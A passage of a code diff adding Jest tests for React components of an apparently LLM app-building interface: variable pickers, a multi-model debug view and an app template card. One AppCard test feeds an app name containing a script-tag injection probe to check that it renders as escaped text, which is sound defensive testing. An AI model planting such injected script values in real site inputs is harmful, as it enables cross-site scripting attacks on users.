expect(screen.getByText('Mock settings modal')).toBeInTheDocument()
const overlay = Array.from(document.querySelectorAll('[class]'))
.find(element => element.className.toString().includes('bg-black/30'))
expect(overlay).toBeInTheDocument()
})
})

View File

@ -0,0 +1,299 @@
import * as React from 'react'
import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import ContextVar from './index'
import type { Props } from './var-picker'
// Mock external dependencies only
jest.mock('next/navigation', () => ({
useRouter: () => ({ push: jest.fn() }),
usePathname: () => '/test',
}))
type PortalToFollowElemProps = {
children: React.ReactNode
open?: boolean
onOpenChange?: (open: boolean) => void
}
type PortalToFollowElemTriggerProps = React.HTMLAttributes<HTMLElement> & { children?: React.ReactNode; asChild?: boolean }
type PortalToFollowElemContentProps = React.HTMLAttributes<HTMLDivElement> & { children?: React.ReactNode }
jest.mock('@/app/components/base/portal-to-follow-elem', () => {
const PortalContext = React.createContext({ open: false })
const PortalToFollowElem = ({ children, open }: PortalToFollowElemProps) => {
return (
<PortalContext.Provider value={{ open: !!open }}>
<div data-testid="portal">{children}</div>
</PortalContext.Provider>
)
}
const PortalToFollowElemContent = ({ children, ...props }: PortalToFollowElemContentProps) => {
const { open } = React.useContext(PortalContext)
if (!open) return null
return (
<div data-testid="portal-content" {...props}>
{children}
</div>
)
}
const PortalToFollowElemTrigger = ({ children, asChild, ...props }: PortalToFollowElemTriggerProps) => {
if (asChild && React.isValidElement(children)) {
return React.cloneElement(children, {
...props,
'data-testid': 'portal-trigger',
} as React.HTMLAttributes<HTMLElement>)
}
return (
<div data-testid="portal-trigger" {...props}>
{children}
</div>
)
}
return {
PortalToFollowElem,
PortalToFollowElemContent,
PortalToFollowElemTrigger,
}
})
describe('ContextVar', () => {
const mockOptions: Props['options'] = [
{ name: 'Variable 1', value: 'var1', type: 'string' },
{ name: 'Variable 2', value: 'var2', type: 'number' },
]
const defaultProps: Props = {
value: 'var1',
options: mockOptions,
onChange: jest.fn(),
}
beforeEach(() => {
jest.clearAllMocks()
})
// Rendering tests (REQUIRED)
describe('Rendering', () => {
it('should display query variable selector when options are provided', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.title')).toBeInTheDocument()
})
it('should show selected variable with proper formatting when value is provided', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('var1')).toBeInTheDocument()
expect(screen.getByText('{{')).toBeInTheDocument()
expect(screen.getByText('}}')).toBeInTheDocument()
})
})
// Props tests (REQUIRED)
describe('Props', () => {
it('should display selected variable when value prop is provided', () => {
// Arrange
const props = { ...defaultProps, value: 'var2' }
// Act
render(<ContextVar {...props} />)
// Assert - Should display the selected value
expect(screen.getByText('var2')).toBeInTheDocument()
})
it('should show placeholder text when no value is selected', () => {
// Arrange
const props = {
...defaultProps,
value: undefined,
}
// Act
render(<ContextVar {...props} />)
// Assert - Should show placeholder instead of variable
expect(screen.queryByText('var1')).not.toBeInTheDocument()
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
})
it('should display custom tip message when notSelectedVarTip is provided', () => {
// Arrange
const props = {
...defaultProps,
value: undefined,
notSelectedVarTip: 'Select a variable',
}
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('Select a variable')).toBeInTheDocument()
})
it('should apply custom className to VarPicker when provided', () => {
// Arrange
const props = {
...defaultProps,
className: 'custom-class',
}
// Act
const { container } = render(<ContextVar {...props} />)
// Assert
expect(container.querySelector('.custom-class')).toBeInTheDocument()
})
})
// User Interactions
describe('User Interactions', () => {
it('should call onChange when user selects a different variable', async () => {
// Arrange
const onChange = jest.fn()
const props = { ...defaultProps, onChange }
const user = userEvent.setup()
// Act
render(<ContextVar {...props} />)
const triggers = screen.getAllByTestId('portal-trigger')
const varPickerTrigger = triggers[triggers.length - 1]
await user.click(varPickerTrigger)
expect(screen.getByTestId('portal-content')).toBeInTheDocument()
// Select a different option
const options = screen.getAllByText('var2')
expect(options.length).toBeGreaterThan(0)
await user.click(options[0])
// Assert
expect(onChange).toHaveBeenCalledWith('var2')
expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument()
})
it('should toggle dropdown when clicking the trigger button', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<ContextVar {...props} />)
const triggers = screen.getAllByTestId('portal-trigger')
const varPickerTrigger = triggers[triggers.length - 1]
// Open dropdown
await user.click(varPickerTrigger)
expect(screen.getByTestId('portal-content')).toBeInTheDocument()
// Close dropdown
await user.click(varPickerTrigger)
expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument()
})
})
// Edge Cases (REQUIRED)
describe('Edge Cases', () => {
it('should handle undefined value gracefully', () => {
// Arrange
const props = {
...defaultProps,
value: undefined,
}
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.title')).toBeInTheDocument()
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
expect(screen.queryByText('var1')).not.toBeInTheDocument()
})
it('should handle empty options array', () => {
// Arrange
const props = {
...defaultProps,
options: [],
value: undefined,
}
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.title')).toBeInTheDocument()
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
})
it('should handle null value without crashing', () => {
// Arrange
const props = {
...defaultProps,
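// The optional value prop is left undefined to represent a nullish (unselected) value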
value: undefined,
}
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.title')).toBeInTheDocument()
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
})
it('should handle options with different data types', () => {
// Arrange
const props = {
...defaultProps,
options: [
{ name: 'String Var', value: 'strVar', type: 'string' },
{ name: 'Number Var', value: '42', type: 'number' },
{ name: 'Boolean Var', value: 'true', type: 'boolean' },
],
value: 'strVar',
}
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('strVar')).toBeInTheDocument()
expect(screen.getByText('{{')).toBeInTheDocument()
expect(screen.getByText('}}')).toBeInTheDocument()
})
it('should render variable names with special characters safely', () => {
// Arrange
const props = {
...defaultProps,
options: [
{ name: 'Variable with & < > " \' characters', value: 'specialVar', type: 'string' },
],
value: 'specialVar',
}
// Act
render(<ContextVar {...props} />)
// Assert
expect(screen.getByText('specialVar')).toBeInTheDocument()
})
})
})

View File

@@ -0,0 +1,392 @@
import * as React from 'react'
import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import VarPicker, { type Props } from './var-picker'
// Mock external dependencies only
jest.mock('next/navigation', () => ({
useRouter: () => ({ push: jest.fn() }),
usePathname: () => '/test',
}))
type PortalToFollowElemProps = {
children: React.ReactNode
open?: boolean
onOpenChange?: (open: boolean) => void
}
type PortalToFollowElemTriggerProps = React.HTMLAttributes<HTMLElement> & { children?: React.ReactNode; asChild?: boolean }
type PortalToFollowElemContentProps = React.HTMLAttributes<HTMLDivElement> & { children?: React.ReactNode }
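// Mock the portal wrapper so dropdown open/close state is observable via the portal-trigger / portal-content test ids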
jest.mock('@/app/components/base/portal-to-follow-elem', () => {
const PortalContext = React.createContext({ open: false })
const PortalToFollowElem = ({ children, open }: PortalToFollowElemProps) => {
return (
<PortalContext.Provider value={{ open: !!open }}>
<div data-testid="portal">{children}</div>
</PortalContext.Provider>
)
}
const PortalToFollowElemContent = ({ children, ...props }: PortalToFollowElemContentProps) => {
const { open } = React.useContext(PortalContext)
if (!open) return null
return (
<div data-testid="portal-content" {...props}>
{children}
</div>
)
}
const PortalToFollowElemTrigger = ({ children, asChild, ...props }: PortalToFollowElemTriggerProps) => {
if (asChild && React.isValidElement(children)) {
return React.cloneElement(children, {
...props,
'data-testid': 'portal-trigger',
} as React.HTMLAttributes<HTMLElement>)
}
return (
<div data-testid="portal-trigger" {...props}>
{children}
</div>
)
}
return {
PortalToFollowElem,
PortalToFollowElemContent,
PortalToFollowElemTrigger,
}
})
describe('VarPicker', () => {
const mockOptions: Props['options'] = [
{ name: 'Variable 1', value: 'var1', type: 'string' },
{ name: 'Variable 2', value: 'var2', type: 'number' },
{ name: 'Variable 3', value: 'var3', type: 'boolean' },
]
const defaultProps: Props = {
value: 'var1',
options: mockOptions,
onChange: jest.fn(),
}
beforeEach(() => {
jest.clearAllMocks()
})
// Rendering tests (REQUIRED)
describe('Rendering', () => {
it('should render variable picker with dropdown trigger', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByTestId('portal-trigger')).toBeInTheDocument()
expect(screen.getByText('var1')).toBeInTheDocument()
})
it('should display selected variable with type icon when value is provided', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByText('var1')).toBeInTheDocument()
expect(screen.getByText('{{')).toBeInTheDocument()
expect(screen.getByText('}}')).toBeInTheDocument()
// IconTypeIcon should be rendered (check for svg icon)
expect(document.querySelector('svg')).toBeInTheDocument()
})
it('should show placeholder text when no value is selected', () => {
// Arrange
const props = {
...defaultProps,
value: undefined,
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.queryByText('var1')).not.toBeInTheDocument()
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
})
it('should display custom tip message when notSelectedVarTip is provided', () => {
// Arrange
const props = {
...defaultProps,
value: undefined,
notSelectedVarTip: 'Select a variable',
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByText('Select a variable')).toBeInTheDocument()
})
it('should render dropdown indicator icon', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<VarPicker {...props} />)
// Assert - Trigger should be present
expect(screen.getByTestId('portal-trigger')).toBeInTheDocument()
})
})
// Props tests (REQUIRED)
describe('Props', () => {
it('should apply custom className to wrapper', () => {
// Arrange
const props = {
...defaultProps,
className: 'custom-class',
}
// Act
const { container } = render(<VarPicker {...props} />)
// Assert
expect(container.querySelector('.custom-class')).toBeInTheDocument()
})
it('should apply custom triggerClassName to trigger button', () => {
// Arrange
const props = {
...defaultProps,
triggerClassName: 'custom-trigger-class',
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByTestId('portal-trigger')).toHaveClass('custom-trigger-class')
})
it('should display selected value with proper formatting', () => {
// Arrange
const props = {
...defaultProps,
value: 'customVar',
options: [
{ name: 'Custom Variable', value: 'customVar', type: 'string' },
],
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByText('customVar')).toBeInTheDocument()
expect(screen.getByText('{{')).toBeInTheDocument()
expect(screen.getByText('}}')).toBeInTheDocument()
})
})
// User Interactions
describe('User Interactions', () => {
it('should open dropdown when clicking the trigger button', async () => {
// Arrange
const onChange = jest.fn()
const props = { ...defaultProps, onChange }
const user = userEvent.setup()
// Act
render(<VarPicker {...props} />)
await user.click(screen.getByTestId('portal-trigger'))
// Assert
expect(screen.getByTestId('portal-content')).toBeInTheDocument()
})
it('should call onChange and close dropdown when selecting an option', async () => {
// Arrange
const onChange = jest.fn()
const props = { ...defaultProps, onChange }
const user = userEvent.setup()
// Act
render(<VarPicker {...props} />)
// Open dropdown
await user.click(screen.getByTestId('portal-trigger'))
expect(screen.getByTestId('portal-content')).toBeInTheDocument()
// Select a different option
const options = screen.getAllByText('var2')
expect(options.length).toBeGreaterThan(0)
await user.click(options[0])
// Assert
expect(onChange).toHaveBeenCalledWith('var2')
expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument()
})
it('should toggle dropdown when clicking trigger button multiple times', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<VarPicker {...props} />)
const trigger = screen.getByTestId('portal-trigger')
// Open dropdown
await user.click(trigger)
expect(screen.getByTestId('portal-content')).toBeInTheDocument()
// Close dropdown
await user.click(trigger)
expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument()
})
})
// State Management
describe('State Management', () => {
it('should initialize with closed dropdown', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument()
})
it('should toggle dropdown state on trigger click', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<VarPicker {...props} />)
const trigger = screen.getByTestId('portal-trigger')
expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument()
// Open dropdown
await user.click(trigger)
expect(screen.getByTestId('portal-content')).toBeInTheDocument()
// Close dropdown
await user.click(trigger)
expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument()
})
it('should preserve selected value when dropdown is closed without selection', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<VarPicker {...props} />)
// Open and close dropdown without selecting anything
const trigger = screen.getByTestId('portal-trigger')
await user.click(trigger)
await user.click(trigger)
// Assert
expect(screen.getByText('var1')).toBeInTheDocument() // Original value still displayed
})
})
// Edge Cases (REQUIRED)
describe('Edge Cases', () => {
it('should handle undefined value gracefully', () => {
// Arrange
const props = {
...defaultProps,
value: undefined,
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
expect(screen.getByTestId('portal-trigger')).toBeInTheDocument()
})
it('should handle empty options array', () => {
// Arrange
const props = {
...defaultProps,
options: [],
value: undefined,
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByTestId('portal-trigger')).toBeInTheDocument()
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
})
it('should handle null value without crashing', () => {
// Arrange
const props = {
...defaultProps,
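// The optional value prop is left undefined to represent a nullish (unselected) value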
value: undefined,
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument()
})
it('should handle variable names with special characters safely', () => {
// Arrange
const props = {
...defaultProps,
options: [
{ name: 'Variable with & < > " \' characters', value: 'specialVar', type: 'string' },
],
value: 'specialVar',
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByText('specialVar')).toBeInTheDocument()
})
it('should handle long variable names', () => {
// Arrange
const props = {
...defaultProps,
options: [
{ name: 'A very long variable name that should be truncated', value: 'longVar', type: 'string' },
],
value: 'longVar',
}
// Act
render(<VarPicker {...props} />)
// Assert
expect(screen.getByText('longVar')).toBeInTheDocument()
expect(screen.getByTestId('portal-trigger')).toBeInTheDocument()
})
})
})

View File

@@ -51,12 +51,6 @@ const mockFiles: FileEntity[] = [
},
]
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
jest.mock('@/context/debug-configuration', () => ({
__esModule: true,
useDebugConfigurationContext: () => mockUseDebugConfigurationContext(),
@@ -206,6 +200,218 @@ describe('DebugWithMultipleModel', () => {
mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration())
})
describe('edge cases and error handling', () => {
it('should handle empty multipleModelConfigs array', () => {
renderComponent({ multipleModelConfigs: [] })
expect(screen.queryByTestId('debug-item')).not.toBeInTheDocument()
expect(screen.getByTestId('chat-input-area')).toBeInTheDocument()
})
it('should handle model config with missing required fields', () => {
const incompleteConfig = { id: 'incomplete' } as ModelAndParameter
renderComponent({ multipleModelConfigs: [incompleteConfig] })
expect(screen.getByTestId('debug-item')).toBeInTheDocument()
})
it('should handle more than 4 model configs', () => {
const manyConfigs = Array.from({ length: 6 }, () => createModelAndParameter())
renderComponent({ multipleModelConfigs: manyConfigs })
const items = screen.getAllByTestId('debug-item')
expect(items).toHaveLength(6)
// Items beyond 4 should not have specialized positioning
items.slice(4).forEach((item) => {
expect(item.style.transform).toBe('translateX(0) translateY(0)')
})
})
it('should handle modelConfig with undefined prompt_variables', () => {
// Note: The current component doesn't handle undefined/null prompt_variables gracefully
// This test documents the current behavior
const modelConfig = createModelConfig()
modelConfig.configs.prompt_variables = undefined as any
mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration({
modelConfig,
}))
expect(() => renderComponent()).toThrow('Cannot read properties of undefined (reading \'filter\')')
})
it('should handle modelConfig with null prompt_variables', () => {
// Note: The current component doesn't handle undefined/null prompt_variables gracefully
// This test documents the current behavior
const modelConfig = createModelConfig()
modelConfig.configs.prompt_variables = null as any
mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration({
modelConfig,
}))
expect(() => renderComponent()).toThrow('Cannot read properties of null (reading \'filter\')')
})
it('should handle prompt_variables with missing required fields', () => {
const incompleteVariables: PromptVariableWithMeta[] = [
{ key: '', name: 'Empty Key', type: 'string' }, // Empty key
{ key: 'valid-key', name: undefined as any, type: 'number' }, // Undefined name
{ key: 'no-type', name: 'No Type', type: undefined as any }, // Undefined type
]
const debugConfiguration = createDebugConfiguration({
modelConfig: createModelConfig(incompleteVariables),
})
mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration)
renderComponent()
// Should still render but handle gracefully
expect(screen.getByTestId('chat-input-area')).toBeInTheDocument()
expect(capturedChatInputProps?.inputsForm).toHaveLength(3)
})
})
describe('props and callbacks', () => {
it('should call onMultipleModelConfigsChange when provided', () => {
const onMultipleModelConfigsChange = jest.fn()
renderComponent({ onMultipleModelConfigsChange })
// Context provider should pass through the callback
expect(onMultipleModelConfigsChange).not.toHaveBeenCalled()
})
it('should call onDebugWithMultipleModelChange when provided', () => {
const onDebugWithMultipleModelChange = jest.fn()
renderComponent({ onDebugWithMultipleModelChange })
// Context provider should pass through the callback
expect(onDebugWithMultipleModelChange).not.toHaveBeenCalled()
})
it('should not memoize when props change', () => {
const props1 = createProps({ multipleModelConfigs: [createModelAndParameter({ id: 'model-1' })] })
const { rerender } = renderComponent(props1)
const props2 = createProps({ multipleModelConfigs: [createModelAndParameter({ id: 'model-2' })] })
rerender(<DebugWithMultipleModel {...props2} />)
const items = screen.getAllByTestId('debug-item')
expect(items[0]).toHaveAttribute('data-model-id', 'model-2')
})
})
describe('accessibility', () => {
it('should have accessible chat input elements', () => {
renderComponent()
const chatInput = screen.getByTestId('chat-input-area')
expect(chatInput).toBeInTheDocument()
// Check for button accessibility
const sendButton = screen.getByRole('button', { name: /send/i })
expect(sendButton).toBeInTheDocument()
const featureButton = screen.getByRole('button', { name: /feature/i })
expect(featureButton).toBeInTheDocument()
})
it('should apply ARIA attributes correctly', () => {
const multipleModelConfigs = [createModelAndParameter()]
renderComponent({ multipleModelConfigs })
// Debug items should be identifiable
const debugItem = screen.getByTestId('debug-item')
expect(debugItem).toBeInTheDocument()
expect(debugItem).toHaveAttribute('data-model-id')
})
})
describe('prompt variables transformation', () => {
it('should filter out API type variables', () => {
const promptVariables: PromptVariableWithMeta[] = [
{ key: 'normal', name: 'Normal', type: 'string' },
{ key: 'api-var', name: 'API Var', type: 'api' },
{ key: 'number', name: 'Number', type: 'number' },
]
const debugConfiguration = createDebugConfiguration({
modelConfig: createModelConfig(promptVariables),
})
mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration)
renderComponent()
expect(capturedChatInputProps?.inputsForm).toHaveLength(2)
expect(capturedChatInputProps?.inputsForm).toEqual(
expect.arrayContaining([
expect.objectContaining({ label: 'Normal', variable: 'normal' }),
expect.objectContaining({ label: 'Number', variable: 'number' }),
]),
)
expect(capturedChatInputProps?.inputsForm).not.toEqual(
expect.arrayContaining([
expect.objectContaining({ label: 'API Var' }),
]),
)
})
it('should handle missing hide and required properties', () => {
const promptVariables: Partial<PromptVariableWithMeta>[] = [
{ key: 'no-hide', name: 'No Hide', type: 'string', required: true },
{ key: 'no-required', name: 'No Required', type: 'number', hide: true },
]
const debugConfiguration = createDebugConfiguration({
modelConfig: createModelConfig(promptVariables as PromptVariableWithMeta[]),
})
mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration)
renderComponent()
expect(capturedChatInputProps?.inputsForm).toEqual([
expect.objectContaining({
label: 'No Hide',
variable: 'no-hide',
hide: false, // Should default to false
required: true,
}),
expect.objectContaining({
label: 'No Required',
variable: 'no-required',
hide: true,
required: false, // Should default to false
}),
])
})
it('should preserve original hide and required values', () => {
const promptVariables: PromptVariableWithMeta[] = [
{ key: 'hidden-optional', name: 'Hidden Optional', type: 'string', hide: true, required: false },
{ key: 'visible-required', name: 'Visible Required', type: 'number', hide: false, required: true },
]
const debugConfiguration = createDebugConfiguration({
modelConfig: createModelConfig(promptVariables),
})
mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration)
renderComponent()
expect(capturedChatInputProps?.inputsForm).toEqual([
expect.objectContaining({
label: 'Hidden Optional',
variable: 'hidden-optional',
hide: true,
required: false,
}),
expect.objectContaining({
label: 'Visible Required',
variable: 'visible-required',
hide: false,
required: true,
}),
])
})
})
describe('chat input rendering', () => {
it('should render chat input in chat mode with transformed prompt variables and feature handler', () => {
// Arrange
@@ -326,6 +532,43 @@ describe('DebugWithMultipleModel', () => {
})
})
describe('performance optimization', () => {
it('should memoize callback functions correctly', () => {
const props = createProps({ multipleModelConfigs: [createModelAndParameter()] })
const { rerender } = renderComponent(props)
// First render
const firstItems = screen.getAllByTestId('debug-item')
expect(firstItems).toHaveLength(1)
// Rerender with exactly the same props; the memoized output should remain stable
rerender(<DebugWithMultipleModel {...props} />)
const secondItems = screen.getAllByTestId('debug-item')
expect(secondItems).toHaveLength(1)
// Check that the element still renders the same content
expect(firstItems[0]).toHaveTextContent(secondItems[0].textContent || '')
})
it('should recalculate size and position when number of models changes', () => {
const { rerender } = renderComponent({ multipleModelConfigs: [createModelAndParameter()] })
// Single model - no special sizing
const singleItem = screen.getByTestId('debug-item')
expect(singleItem.style.width).toBe('')
// Change to 2 models
rerender(<DebugWithMultipleModel {...createProps({
multipleModelConfigs: [createModelAndParameter(), createModelAndParameter()],
})} />)
const twoItems = screen.getAllByTestId('debug-item')
expect(twoItems[0].style.width).toBe('calc(50% - 4px - 24px)')
expect(twoItems[1].style.width).toBe('calc(50% - 4px - 24px)')
})
})
describe('layout sizing and positioning', () => {
const expectItemLayout = (
element: HTMLElement,

View File

@@ -0,0 +1,347 @@
import { render, screen, within } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import AppCard from './index'
import type { AppIconType } from '@/types/app'
import { AppModeEnum } from '@/types/app'
import type { App } from '@/models/explore'
jest.mock('@heroicons/react/20/solid', () => ({
PlusIcon: ({ className }: { className?: string }) => <div data-testid="plus-icon" className={className} aria-label="Add icon">+</div>,
}))
const mockApp: App = {
app: {
id: 'test-app-id',
mode: AppModeEnum.CHAT,
icon_type: 'emoji' as AppIconType,
icon: '🤖',
icon_background: '#FFEAD5',
icon_url: '',
name: 'Test Chat App',
description: 'A test chat application for demonstration purposes',
use_icon_as_answer_icon: false,
},
app_id: 'test-app-id',
description: 'A comprehensive chat application template',
copyright: 'Test Corp',
privacy_policy: null,
custom_disclaimer: null,
category: 'Assistant',
position: 1,
is_listed: true,
install_count: 100,
installed: false,
editable: true,
is_agent: false,
}
describe('AppCard', () => {
const defaultProps = {
app: mockApp,
canCreate: true,
onCreate: jest.fn(),
}
beforeEach(() => {
jest.clearAllMocks()
})
describe('Rendering', () => {
it('should render without crashing', () => {
const { container } = render(<AppCard {...defaultProps} />)
expect(container.querySelector('em-emoji')).toBeInTheDocument()
expect(screen.getByText('Test Chat App')).toBeInTheDocument()
expect(screen.getByText(mockApp.description)).toBeInTheDocument()
})
it('should render app type icon and label', () => {
const { container } = render(<AppCard {...defaultProps} />)
expect(container.querySelector('svg')).toBeInTheDocument()
expect(screen.getByText('app.typeSelector.chatbot')).toBeInTheDocument()
})
})
describe('Props', () => {
describe('canCreate behavior', () => {
it('should show create button when canCreate is true', () => {
render(<AppCard {...defaultProps} canCreate={true} />)
const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ })
expect(button).toBeInTheDocument()
})
it('should hide create button when canCreate is false', () => {
render(<AppCard {...defaultProps} canCreate={false} />)
const button = screen.queryByRole('button', { name: /app\.newApp\.useTemplate/ })
expect(button).not.toBeInTheDocument()
})
})
it('should display app name from appBasicInfo', () => {
const customApp = {
...mockApp,
app: {
...mockApp.app,
name: 'Custom App Name',
},
}
render(<AppCard {...defaultProps} app={customApp} />)
expect(screen.getByText('Custom App Name')).toBeInTheDocument()
})
it('should display app description from app level', () => {
const customApp = {
...mockApp,
description: 'Custom description for the app',
}
render(<AppCard {...defaultProps} app={customApp} />)
expect(screen.getByText('Custom description for the app')).toBeInTheDocument()
})
it('should truncate long app names', () => {
const longNameApp = {
...mockApp,
app: {
...mockApp.app,
name: 'This is a very long app name that should be truncated with line-clamp-1',
},
}
render(<AppCard {...defaultProps} app={longNameApp} />)
const nameElement = screen.getByTitle('This is a very long app name that should be truncated with line-clamp-1')
expect(nameElement).toBeInTheDocument()
})
})
describe('App Modes - Data Driven Tests', () => {
const testCases = [
{
mode: AppModeEnum.CHAT,
expectedLabel: 'app.typeSelector.chatbot',
description: 'Chat application mode',
},
{
mode: AppModeEnum.AGENT_CHAT,
expectedLabel: 'app.typeSelector.agent',
description: 'Agent chat mode',
},
{
mode: AppModeEnum.COMPLETION,
expectedLabel: 'app.typeSelector.completion',
description: 'Completion mode',
},
{
mode: AppModeEnum.ADVANCED_CHAT,
expectedLabel: 'app.typeSelector.advanced',
description: 'Advanced chat mode',
},
{
mode: AppModeEnum.WORKFLOW,
expectedLabel: 'app.typeSelector.workflow',
description: 'Workflow mode',
},
]
testCases.forEach(({ mode, expectedLabel, description }) => {
it(`should display correct type label for ${description}`, () => {
const appWithMode = {
...mockApp,
app: {
...mockApp.app,
mode,
},
}
render(<AppCard {...defaultProps} app={appWithMode} />)
expect(screen.getByText(expectedLabel)).toBeInTheDocument()
})
})
})
describe('Icon Type Tests', () => {
it('should render emoji icon without image element', () => {
const appWithIcon = {
...mockApp,
app: {
...mockApp.app,
icon_type: 'emoji' as AppIconType,
icon: '🤖',
},
}
const { container } = render(<AppCard {...defaultProps} app={appWithIcon} />)
const card = container.firstElementChild as HTMLElement
expect(within(card).queryByRole('img', { name: 'app icon' })).not.toBeInTheDocument()
expect(card.querySelector('em-emoji')).toBeInTheDocument()
})
it('should prioritize icon_url when both icon and icon_url are provided', () => {
const appWithImageUrl = {
...mockApp,
app: {
...mockApp.app,
icon_type: 'image' as AppIconType,
icon: 'local-icon.png',
icon_url: 'https://example.com/remote-icon.png',
},
}
render(<AppCard {...defaultProps} app={appWithImageUrl} />)
expect(screen.getByRole('img', { name: 'app icon' })).toHaveAttribute('src', 'https://example.com/remote-icon.png')
})
})
describe('User Interactions', () => {
it('should call onCreate when create button is clicked', async () => {
const mockOnCreate = jest.fn()
render(<AppCard {...defaultProps} onCreate={mockOnCreate} />)
const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ })
await userEvent.click(button)
expect(mockOnCreate).toHaveBeenCalledTimes(1)
})
it('should handle click on card itself', async () => {
const mockOnCreate = jest.fn()
const { container } = render(<AppCard {...defaultProps} onCreate={mockOnCreate} />)
const card = container.firstElementChild as HTMLElement
await userEvent.click(card)
// Note: Card click doesn't trigger onCreate, only the button does
expect(mockOnCreate).not.toHaveBeenCalled()
})
})
describe('Keyboard Accessibility', () => {
it('should allow the create button to be focused', async () => {
const mockOnCreate = jest.fn()
render(<AppCard {...defaultProps} onCreate={mockOnCreate} />)
await userEvent.tab()
const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ }) as HTMLButtonElement
// Test that button can be focused
expect(button).toHaveFocus()
// Test click event works (keyboard events on buttons typically trigger click)
await userEvent.click(button)
expect(mockOnCreate).toHaveBeenCalledTimes(1)
})
})
describe('Edge Cases', () => {
it('should handle app with null icon_type', () => {
const appWithNullIcon = {
...mockApp,
app: {
...mockApp.app,
icon_type: null,
},
}
const { container } = render(<AppCard {...defaultProps} app={appWithNullIcon} />)
const appIcon = container.querySelector('em-emoji')
expect(appIcon).toBeInTheDocument()
// AppIcon component should handle null icon_type gracefully
})
it('should handle app with empty description', () => {
const appWithEmptyDesc = {
...mockApp,
description: '',
}
const { container } = render(<AppCard {...defaultProps} app={appWithEmptyDesc} />)
const descriptionContainer = container.querySelector('.line-clamp-3')
expect(descriptionContainer).toBeInTheDocument()
expect(descriptionContainer).toHaveTextContent('')
})
it('should handle app with very long description', () => {
const longDescription = 'This is a very long description that should be truncated with line-clamp-3. '.repeat(5)
const appWithLongDesc = {
...mockApp,
description: longDescription,
}
render(<AppCard {...defaultProps} app={appWithLongDesc} />)
expect(screen.getByText(/This is a very long description/)).toBeInTheDocument()
})
it('should handle app with special characters in name', () => {
const appWithSpecialChars = {
...mockApp,
app: {
...mockApp.app,
name: 'App <script>alert("test")</script> & Special "Chars"',
},
}
render(<AppCard {...defaultProps} app={appWithSpecialChars} />)
expect(screen.getByText('App <script>alert("test")</script> & Special "Chars"')).toBeInTheDocument()
})
it('should handle onCreate function throwing error', async () => {
const errorOnCreate = jest.fn(() => {
throw new Error('Create failed')
})
// Mock console.error to avoid test output noise
const consoleSpy = jest.spyOn(console, 'error').mockImplementation(jest.fn())
render(<AppCard {...defaultProps} onCreate={errorOnCreate} />)
const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ })
let capturedError: unknown
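// userEvent.click may reject when the click handler throws, so capture the error instead of failing the test outright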
try {
await userEvent.click(button)
}
catch (err) {
capturedError = err
}
expect(errorOnCreate).toHaveBeenCalledTimes(1)
expect(consoleSpy).toHaveBeenCalled()
if (capturedError instanceof Error)
expect(capturedError.message).toContain('Create failed')
consoleSpy.mockRestore()
})
})
describe('Accessibility', () => {
